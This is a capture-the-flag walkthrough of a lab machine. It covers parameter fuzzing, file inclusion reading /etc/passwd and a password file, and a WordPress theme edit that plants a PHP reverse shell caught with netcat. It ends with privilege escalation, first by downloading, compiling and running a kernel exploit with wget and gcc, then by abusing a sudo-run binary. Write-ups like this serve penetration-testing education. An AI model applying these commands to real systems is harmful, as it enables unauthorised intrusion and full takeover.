********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000002: 200 7 L 12 W 136 Ch "00"
000000003: 200 7 L 12 W 136 Ch "01"
000000004: 200 7 L 12 W 136 Ch "02"
000000005: 200 7 L 12 W 136 Ch "03"
000000006: 200 7 L 12 W 136 Ch "1"
000000008: 200 7 L 12 W 136 Ch "100"
000000007: 200 7 L 12 W 136 Ch "10"
As we can see is 12 word, then we can add --hw parameter inside with 12 indicates hide all the length of 12 of words
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000340: 200 7 L 19 W 206 Ch "file"
Total time: 1.358470
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 698.5795
We know that there is a parameter called file, from there we can go to the index.php and at the end of the URL put ?file=location.txt that the secret.txt provided for us.
Got this, secrettier360, on other php page, let's use gobuster to further enumerate.
gobuster
gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 6 L 17 W 197 Ch "@"
000000002: 200 6 L 17 W 197 Ch "00"
000000003: 200 6 L 17 W 197 Ch "01"
000000004: 200 6 L 17 W 197 Ch "02"
000000005: 200 6 L 17 W 197 Ch "03"
000000012: 200 6 L 17 W 197 Ch "20"
000000014: 200 6 L 17 W 197 Ch "2000"
000000006: 200 6 L 17 W 197 Ch "1"
As we can see 17 words, so we put --hw argument at 17
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000256: 200 13 L 43 W 328 Ch "dev"
Total time: 1.601662
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 592.5094
We then got dev, let's supply it inside the URL.
Next we can replace dev to /etc/passwd
We can see that password.txt in the directory /home/saket, lets replace the /etc/passwd
We got a password that is follow_the_ippsec
Reverse Shell
We found a wordpress website
Then we go to the log in site and put username as victor and password as follow_the_ippsec
We logged into the admin panel
After wandering around, under Appearance and go to Theme Editor
On the right side, there is a php file called secret.php
Got a file that can be edited.
We can go to pentestmonkey and grab the php reverse shell file
Copy all of the content of the file to the wordpress, then change the IP and port. Update the file
Before that we need to set up a listener at our machine
nc -nlvp 4444
Then at the URL, navigate to /wordpress/wp-content/themes/twentynineteen/secret.php
we got a shell !.
Privilege Escalation
Navigate to /home/saket and get the user flag
Method 1
searchsploit 16.04 Ubuntu | grep Privilege
Copy it to the current directory
Then, at our machine, we use python to transfer the file
python -m SimpleHTTPServer
At the shell, navigate to /tmp folder,
Then type wget 192.168.1.112:8000/45010.c
After that type gcc 45010.c -o exploit.
Then, chmod +x exploit
Run the exploit by typing ./exploit
type /bin/bash -i to get a proper shell
Navigate to /root and cat the root.txt and get the flag
Congratulation !
Method 2
type sudo -l and we will get this
Nagivate to /home/saket and we will see a executable enc file.
Nothing seems to be happening. After further enumeration, we found out that there is a /opt/backup/server_database and there is a backup password
Navigate back to the enc file directory and run it with sudo ./enc
We got 2 file, enc.txt and key.txt
We first change the string ippsec to the md5 hash since it tells us to do so.
By using this tool, I manage to get the plain text from the encrypted enc.txt
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
We can see the password is tribute_to_ippsec, let's su to saket user account.
Then type sudo -l
Navigate to victor directory again and type sudo /home/victor/undefeated_victor
We found out that there is no bash for the user victor, we can type
cp /bin/bash /tmp/challenge
So that we can access a shell for victor.
run again with sudo /home/victor/undefeated_victor
Got root!
navigate to /root to cat the root.txt to get the flag!
